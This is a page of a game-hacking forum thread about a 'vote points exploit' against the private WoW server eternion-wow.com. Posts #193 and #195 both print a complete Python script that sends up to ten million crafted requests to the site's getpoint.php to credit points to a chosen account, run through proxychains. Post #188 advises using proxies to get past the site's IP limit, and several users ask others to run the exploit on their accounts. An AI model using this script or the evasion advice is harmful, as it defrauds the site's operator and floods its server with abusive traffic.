Eternion wow vote points public now... menu

User Tag List

Page 13 of 15 FirstFirst ... 9101112131415 LastLast
Results 181 to 195 of 224
  1. #181
    baneil's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Another Noob Q

    Can anyone please PM or e-mail me a copy of the updated script?

    Eternion wow vote points public now...
  2. #182
    mixutus's Avatar Member
    Reputation
    1
    Join Date
    Jul 2008
    Posts
    7
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    how can i make the vote hack work dont understand it lol plz help, and btw someppl say it does not work anymore plz reply!:!:!::!!!

  3. #183
    wirpa0321's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    15
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i wonder to if it still works and then were i can get it

  4. #184
    sunscale's Avatar Member
    Reputation
    1
    Join Date
    Oct 2007
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Was a while since you told to reply but can you get me like 900 points on account "Greger" ...or (solskal)

  5. #185
    humonquly13's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    8
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    the latest script doesn't work anymore. But i'm sure they are making a new one, or atleast trying

  6. #186
    Yomn567's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hey, can someone please ru this on my account? The account name in superman117. Thanks!

  7. #187
    baneil's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Updated Vote

    Has anyone gotten this to work?

    I have tried changing it to use the other vote sections and to use a new sn but nothing seems to work on it anymore

  8. #188
    ZeratuelX's Avatar Member
    Reputation
    4
    Join Date
    Feb 2008
    Posts
    21
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It's limited by IP now it appears, once per 12 hours. If you want to do it faster, use a proxy.

  9. #189
    carnemolida's Avatar Member
    Reputation
    14
    Join Date
    Apr 2009
    Posts
    13
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    post is gone

  10. #190
    8ik's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It closes with the "Error in connect" thing

  11. #191
    mixutus's Avatar Member
    Reputation
    1
    Join Date
    Jul 2008
    Posts
    7
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    is karapidiola gonna make a new script for this??

  12. #192
    dxadeamon's Avatar Member
    Reputation
    1
    Join Date
    May 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    can any1 post a Tutorial on how to use this? because i have no idea

  13. #193
    domi00700's Avatar Member
    Reputation
    1
    Join Date
    May 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....

    from socket import *
    from time import sleep

    target = 'www.eternion-wow.com'
    port = 80
    request_pt1 = '/getpoint.php?url=xtremetop200&char='
    request_pt2 = '&sn=1234809692227'

    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    if(len(name) > 0):
    print('[-]Name : '+name)
    else:
    print('Name Its Empty??WTF....')
    exit(1)
    #top200
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n'
    count = 10000000
    print('[*]Requesting The Server ! This Maybe Take A Wile...')
    for i in range(0,int(count)):
    try:
    i = socket(AF_INET,SOCK_STREAM)
    except:
    print('[/]Error In SOcket Function')
    exit(1)
    try:
    i.connect((target,int(port)))
    except:
    print('[/]Error In Connect()')
    exit(1)
    try:
    i.send(server_request)
    except:
    print('[/]Error In Send()')
    exit(1)

  14. #194
    manhattan project's Avatar Member
    Reputation
    1
    Join Date
    May 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    same problem as everyone else, i only have 37 points and it closes on me; i left it on over night and idk what happened.
    could someone help me out acc name is Sovietxx thanks and I will rep if i can

  15. #195
    Thomas2222's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by domi00700 View Post
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....

    from socket import *
    from time import sleep

    target = 'www.eternion-wow.com'
    port = 80
    request_pt1 = '/getpoint.php?url=xtremetop200&char='
    request_pt2 = '&sn=1234809692227'

    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    if(len(name) > 0):
    print('[-]Name : '+name)
    else:
    print('Name Its Empty??WTF....')
    exit(1)
    #top200
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n'
    count = 10000000
    print('[*]Requesting The Server ! This Maybe Take A Wile...')
    for i in range(0,int(count)):
    try:
    i = socket(AF_INET,SOCK_STREAM)
    except:
    print('[/]Error In SOcket Function')
    exit(1)
    try:
    i.connect((target,int(port)))
    except:
    print('[/]Error In Connect()')
    exit(1)
    try:
    i.send(server_request)
    except:
    print('[/]Error In Send()')
    exit(1)
    Can someone please explain to me how i use this? I am pretty sure i use it with python still but i put it in a new shell and tried to run it that way but it did not work.

Similar Threads

  1. eternion-wow vote hack
    By supernova1 in forum WoW EMU Questions & Requests
    Replies: 2
    Last Post: 05-01-2010, 09:45 AM
  2. eternion-wow vote hack
    By supernova1 in forum WoW Bots Questions & Requests
    Replies: 1
    Last Post: 05-01-2010, 09:42 AM
  3. Eternion-wow vote points exploid.
    By ludterror in forum WoW EMU Exploits & Bugs
    Replies: 2
    Last Post: 04-02-2010, 12:46 PM
  4. Eternion-wow Vote Expolit
    By knazze in forum WoW EMU Exploits & Bugs
    Replies: 5
    Last Post: 12-03-2009, 05:24 AM
All times are GMT -5. The time now is 05:10 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search